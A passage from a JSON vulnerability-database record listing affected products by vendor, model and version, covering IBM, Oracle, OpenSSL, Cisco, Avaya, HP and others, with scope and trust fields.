            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.03"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.15"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "messaging application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x375087180"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.045"
          },
          {
            "_id": null,
            "model": "jre update10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "websphere real time sr9",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "domino fix pack interim f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.12"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.52"
          },
          {
            "_id": null,
            "model": "idataplex dx360 m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "79130"
          },
          {
            "_id": null,
            "model": "jdk update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.03"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8zc",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.37"
          },
          {
            "_id": null,
            "model": "jre update7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.4"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.01"
          },
          {
            "_id": null,
            "model": "rational software architect design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.01"
          },
          {
            "_id": null,
            "model": "jdk update10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "infosphere optim data masking solution",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.3.0.3"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "java sdk sr16-fp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "link for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.2.0.28"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.1"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.0.9"
          },
          {
            "_id": null,
            "model": "system idataplex dx360 m2 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x73230"
          },
          {
            "_id": null,
            "model": "cognos tm1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "domino fp if4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.36"
          },
          {
            "_id": null,
            "model": "rational requirements composer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.0"
          },
          {
            "_id": null,
            "model": "jre update13",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.6"
          },
          {
            "_id": null,
            "model": "workcentre spar",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "355025.003.33.000"
          },
          {
            "_id": null,
            "model": "buildforge ifix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.2.37"
          },
          {
            "_id": null,
            "model": "adaptive security appliance software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9.2(3.1)"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.1.0.5-p3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "initiate master data service",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.7"
          },
          {
            "_id": null,
            "model": "jdk update21",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.3"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.3"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.1"
          },
          {
            "_id": null,
            "model": "systems insight manager sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "one-x client enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "dataquant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.18"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "8"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1.5"
          },
          {
            "_id": null,
            "model": "tivoli composite application manager for soa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "db2 query management facility",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "network node manager i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3950x57145"
          },
          {
            "_id": null,
            "model": "java sdk sr5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "rational developer for aix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.00"
          },
          {
            "_id": null,
            "model": "vds service broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "jre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.60"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "d9036 modular encoding platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35001.1"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.041"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.6"
          },
          {
            "_id": null,
            "model": "flashsystem 9846-ac1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "app for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "0"
          },
          {
            "_id": null,
            "model": "cognos tm1 interim fix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.0.2"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.1"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "jdk update25",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "cognos business intelligence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12h",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "xiv storage system gen3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.2.0"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "control center ifix02",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.0"
          },
          {
            "_id": null,
            "model": "snapdrive for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1"
          },
          {
            "_id": null,
            "model": "one-x client enablement services sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "bbm protected on ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.7.0.32"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8s",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "flashcopy manager for custom applications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.1"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2.2.835"
          },
          {
            "_id": null,
            "model": "telepresence serial gateway series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "security identity governance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.2.200"
          },
          {
            "_id": null,
            "model": "webex meetings server 2.5mr2",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.2.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.3"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.5"
          },
          {
            "_id": null,
            "model": "jdk update27",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.43"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.1.0.103"
          },
          {
            "_id": null,
            "model": "communication server 1000e signaling server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.24"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.04"
          },
          {
            "_id": null,
            "model": "unified attendant console enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jdk update15",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "platform cluster manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for qa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "domino fp if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.122"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.027"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "db2 enterprise server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "rational reporting for development intelligence",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.0.1"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.770"
          },
          {
            "_id": null,
            "model": "db2 connect application server advanced edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "content analysis system",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "1.2.3.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12d",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "ucs central",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.3.0"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3850x571460"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.1.0.6"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.025"
          },
          {
            "_id": null,
            "model": "flex system compute node type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x44079170"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "_id": null,
            "model": "work browser for bes10/bes12",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.1.17483.17"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.8.05"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.0"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
            "model": "vios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.2.1.3"
          },
          {
            "_id": null,
            "model": "systems insight manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.5"
          },
          {
            "_id": null,
            "model": "rational agent controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.3.3"
          },
          {
            "_id": null,
            "model": "tivoli asset management for it",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1.0"
          },
          {
            "_id": null,
            "model": "nac guest server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.18"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1h",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.4"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for metrics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "communication server 1000m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "jdk update25",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.250"
          },
          {
            "_id": null,
            "model": "db2 advanced enterprise server edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.5"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23 (11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "v2)"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.2.0.5"
          },
          {
            "_id": null,
            "model": "ata series analog terminal adaptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1900"
          },
          {
            "_id": null,
            "model": "enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.12"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.10.186"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5.1.0"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.2"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.5.21"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3.4"
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.211"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "sbr carrier",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "juniper",
            "version": "0"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.2"
          },
          {
            "_id": null,
            "model": "mysql server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "5.6"
          },
          {
            "_id": null,
            "model": "websphere mq mqipt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "rational rhapsody design manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.6"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.033"
          },
          {
            "_id": null,
            "model": "insight orchestration",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.3"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.01"
          },
          {
            "_id": null,
            "model": "flashcopy manager for db2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.0"
          },
          {
            "_id": null,
            "model": "mq light",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.1"
          },
          {
            "_id": null,
            "model": "tandberg codian isdn gw",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "32400"
          },
          {
            "_id": null,
            "model": "cognos tm1 fp4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2.2"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.7"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.3.0.12"
          },
          {
            "_id": null,
            "model": "jdk 01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6"
          },
          {
            "_id": null,
            "model": "aura session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)4.2"
          },
          {
            "_id": null,
            "model": "cms r16.3",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "rational application developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.43"
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.4"
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.11"
          },
          {
            "_id": null,
            "model": "rational doors next generation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.1"
          },
          {
            "_id": null,
            "model": "edge digital media player",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3400"
          },
          {
            "_id": null,
            "model": "business process manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.1.1"
          },
          {
            "_id": null,
            "model": "bbm protected on android",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37006.4.19"
          },
          {
            "_id": null,
            "model": "domino interim fix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.03"
          },
          {
            "_id": null,
            "model": "db2 recovery expert for linux unix and windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.2"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "java",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.0"
          },
          {
            "_id": null,
            "model": "domino fix pack interim f",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.15"
          },
          {
            "_id": null,
            "model": "mashup center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.7"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "flashcopy manager for unix and linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.0"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.0.2.16-p3",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.3"
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.2"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "jdk update9",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "workflow for bluemix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.3.0.870"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.043"
          },
          {
            "_id": null,
            "model": "jre update26",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.260"
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "netezza platform software",
            "scope": "eq",
            "trust": 0.3,
